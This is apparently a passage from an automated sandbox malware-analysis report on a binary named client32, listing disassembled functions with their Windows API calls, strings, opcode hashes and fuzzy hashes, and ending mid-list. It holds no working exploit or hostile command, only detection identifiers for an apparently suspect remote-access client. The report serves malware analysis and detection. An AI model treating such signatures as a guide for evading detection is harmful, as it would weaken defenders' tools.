                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf
                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                • API String ID: 2111968516-476189988
                                                                                • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                • DeleteObject.GDI32(?), ref: 1111F516
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteObject$PaletteSelect
                                                                                • String ID:
                                                                                • API String ID: 2820294704-0
                                                                                • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                Function 110259C0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110259D7
                                                                                • GetDlgItem.USER32(?,00001399), ref: 11025A11
                                                                                • TranslateMessage.USER32(?), ref: 11025A2A
                                                                                • DispatchMessageA.USER32(?), ref: 11025A34
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025A76
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchItemTranslate
                                                                                • String ID:
                                                                                • API String ID: 1381171329-0
                                                                                • Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                                • Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
                                                                                • Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                                • Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94
                                                                                Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                Strings
                                                                                • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                • Global\Client32Provider, xrefs: 1104F1BB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                • API String ID: 3682529815-1899068400
                                                                                • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                Function 11163964 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 11163972
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                • _free.LIBCMT ref: 11163985
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                                • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                                • Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                                • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                                Function 110B3950 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                • String ID:
                                                                                • API String ID: 4125181052-0
                                                                                • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                                • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                                Function 11091B00 Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B1A
                                                                                  • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,76963760,00000000,7697A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                  • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                  • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                • TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                • TranslateMessage.USER32(?), ref: 11091B51
                                                                                • DispatchMessageA.USER32(?), ref: 11091B5B
                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11091B6B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 754905447-0
                                                                                • Opcode ID: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
                                                                                • Instruction ID: 5368b2b879de48b6c9ab70957daae04249f1b13f85d80b649f1e25af9e3021ba
                                                                                • Opcode Fuzzy Hash: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
                                                                                • Instruction Fuzzy Hash: D901B172F4030FABE714DBA58C91FABB3ADEB84718F004568F628D6080F674E40587A4
                                                                                Function 110B38D0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38DB
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38FE
                                                                                • SetEvent.KERNEL32(?,?,?,?,1104697C,?,00000001), ref: 110B391A
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3921
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3937
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                • String ID:
                                                                                • API String ID: 3394196147-0
                                                                                • Opcode ID: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
                                                                                • Instruction ID: 98664a83d6f2f53ed4065ca3297c8b6ddfbfa19bf6bfb34fa0046f3acd8e92ae
                                                                                • Opcode Fuzzy Hash: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
                                                                                • Instruction Fuzzy Hash: 9101DB321402149FD32596D9D444BD7FBE8FF69725F00442BF5AAC6900D7B5E046CB51
                                                                                Function 110F3880 Relevance: 7.5, APIs: 5, Instructions: 45pipesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5EF9), ref: 110F3895
                                                                                • ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5EF9), ref: 110F38AA
                                                                                • GetLastError.KERNEL32(?,?,110F5EF9), ref: 110F38B0
                                                                                • Sleep.KERNEL32(00000064,?,?,110F5EF9), ref: 110F38BF
                                                                                • SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5EF9), ref: 110F38E2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: NamedPipe$HandleState$ConnectErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 218362120-0
                                                                                • Opcode ID: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
                                                                                • Instruction ID: 6745868c0ac614beeabaf6f2984982edca353f63092262b155279210f934f0d8
                                                                                • Opcode Fuzzy Hash: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
                                                                                • Instruction Fuzzy Hash: FE01A430A8431EBBF704CFD4CD86BA9B7ACEB48715F2040A9FD14D6580D7755D1187A1
                                                                                Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 11171312
                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                • __getptd.LIBCMT ref: 11171329
                                                                                • __amsg_exit.LIBCMT ref: 11171337
                                                                                • __lock.LIBCMT ref: 11171347
                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
